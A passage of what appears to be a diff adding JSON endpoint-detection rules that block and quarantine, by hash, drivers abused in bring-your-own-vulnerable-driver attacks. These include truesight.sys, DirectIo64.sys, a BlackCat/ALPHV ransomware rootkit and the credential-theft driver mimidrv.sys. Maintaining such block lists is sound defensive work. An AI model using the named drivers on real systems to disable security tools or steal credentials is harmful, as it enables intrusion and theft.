+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75822137b0934c2146c789d9f6e52da4de4a191698b68819d6d4b0845bbc34ed",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8ee87ab-94f6-530c-b942-1eecde0a0529",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492091Z",
+ "creation_date": "2026-03-23T11:45:31.492093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ec4994e72d5712ef2fb4b9c5e1807393f9e9e98e38e479c6f5f66317c6bbc1e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8eef2d4-d016-5a57-81b9-9e670787bfac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149671Z",
+ "creation_date": "2026-03-23T11:45:31.149674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1502ec276f542cf65e2d6b5159a04ee611ed06c96a0a51a7ab29985cc5634386",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8fc1717-973f-50a1-94e9-8a87f6d289bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985575Z",
+ "creation_date": "2026-03-23T11:45:29.985577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "994e3f5dd082f5d82f9cc84108a60d359910ba79",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8fc473c-4101-5c79-a7ec-6ef2721cea10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486199Z",
+ "creation_date": "2026-03-23T11:45:31.486202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4e0129f40aeefed92e8353c3c2b73593fd9a4673f8480bcc89cdc28a17325d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e8ff58fa-f950-5e7f-9baa-b52627149639",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820325Z",
+ "creation_date": "2026-03-23T11:45:31.820328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820337Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "776a6b62062565f3aaf361c57067ef6b043f7e65a92003ab3e02114f449a17cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e903fbe4-f3ef-509b-8f2e-1884347e01e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493930Z",
+ "creation_date": "2026-03-23T11:45:31.493933Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493942Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1ef67421bfa412aa90db0efee2176313bc40cf86ae31875387a47e57a46e561",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e90c2447-e7f4-5a81-834c-72ebc28b9553",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622314Z",
+ "creation_date": "2026-03-23T11:45:29.622316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bda99629ec6c522c3efcbcc9ca33688d31903146f05b37d0d3b43db81bfb3961",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e910c018-baaa-5440-b8d9-a72d94db6b9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981165Z",
+ "creation_date": "2026-03-23T11:45:29.981168Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981173Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "773999db2f07c50aad70e50c1983fa95804369d25a5b4f10bd610f864c27f2fc",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9136986-a042-5a7b-be5e-65abd504c2c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479183Z",
+ "creation_date": "2026-03-23T11:45:30.479185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479191Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d4ca5760b6ad2e4152080e115f040f9d42608d2c7d7f074a579f911d06c8cf8",
+ "comment": "Vulnerable Kernel Driver (aka NCHGBIOS2x64.SYS) [https://www.loldrivers.io/drivers/d2806397-9ceb-47c8-b5f3-3aabec182ff5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e937acc5-7c16-52de-92c8-a5c235bafba9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809183Z",
+ "creation_date": "2026-03-23T11:45:31.809186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "853a8e09134f2f6bba979fd2c58da7f6891400a1d3466587e5da911f66f9d4a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e93854a4-a16a-5320-ae16-f3f839e57d62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140654Z",
+ "creation_date": "2026-03-23T11:45:31.140656Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140661Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5e0b93a56a54ab0d3a0280792e41e7bc4cbaad8c83296ea36a225257a9083f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e940579f-7060-5d30-b1e5-134a55e4926c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141255Z",
+ "creation_date": "2026-03-23T11:45:31.141257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bce1a5ad428f546c4ed60218c736d488dce97db171a9789c7bb100158adbb823",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e94c01aa-256f-552c-8837-c884ad19928d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978014Z",
+ "creation_date": "2026-03-23T11:45:29.978016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cb1dc26159c6700d6cadece63f6defda642ec1a6d324daefb0965b4e3746f70",
+ "comment": "Vulnerable Kernel Driver (aka bw.sys) [https://www.loldrivers.io/drivers/578d4909-c2ba-4363-b6e3-98fb62d5e55c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e94e621a-2c5a-55e7-b82b-d1a34c5a1683",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142902Z",
+ "creation_date": "2026-03-23T11:45:32.142904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "490cfbb540dcd70b7bff4fdd62e7ed7400bbfebaf5083523d49f7184670f7b9a",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9527af1-2057-5c66-9769-4efe67a412d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464709Z",
+ "creation_date": "2026-03-23T11:45:30.464712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "822982c568b6f44b610f8dc4ab5d94795c33ae08a6a608050941264975c1ecdb",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e954db85-c341-5ee6-a1ae-8e884aeb7cd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820190Z",
+ "creation_date": "2026-03-23T11:45:31.820193Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b55a7edd07072c5c1113b5ca0cd7183ee46f764b8adf9e21cc59a2f22c3c4d8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9569b8d-9423-57db-8da2-b6e9ca02ab66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145360Z",
+ "creation_date": "2026-03-23T11:45:31.145362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57ceafd2895c255019669df566a5e666cc5e285abba0647978b980b1cb858205",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e95819aa-cb4d-5ebc-a7c4-48ed32ed7293",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980699Z",
+ "creation_date": "2026-03-23T11:45:29.980701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d10c4b2f56364b475b60bd2933273c8b1ed2176353e59e65f968c61e93b7d99",
+ "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e95e494e-ab8d-5f6e-ada8-329d1dfd4487",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140726Z",
+ "creation_date": "2026-03-23T11:45:31.140728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ddef89f6c8b7ed80a517685245b7c4f534703a95f2d69495c7a92a88647ca68c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e95ec03d-a73a-59db-a592-219e57b788b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488257Z",
+ "creation_date": "2026-03-23T11:45:31.488259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c649a4fa9d7e58308b37764114361d3825bd40671dc8bb7db5d5fb35895d9946",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e9650d45-14da-5ba1-92f1-6d87278c3355",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972508Z",
+ "creation_date": "2026-03-23T11:45:29.972510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e96546b5-17a4-598e-9a9e-22103f6e25d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978912Z",
+ "creation_date": "2026-03-23T11:45:29.978914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978919Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2449ccc74e745c0339850064313bdd8dc0eff17b3a4e0882184c9576ac93a89",
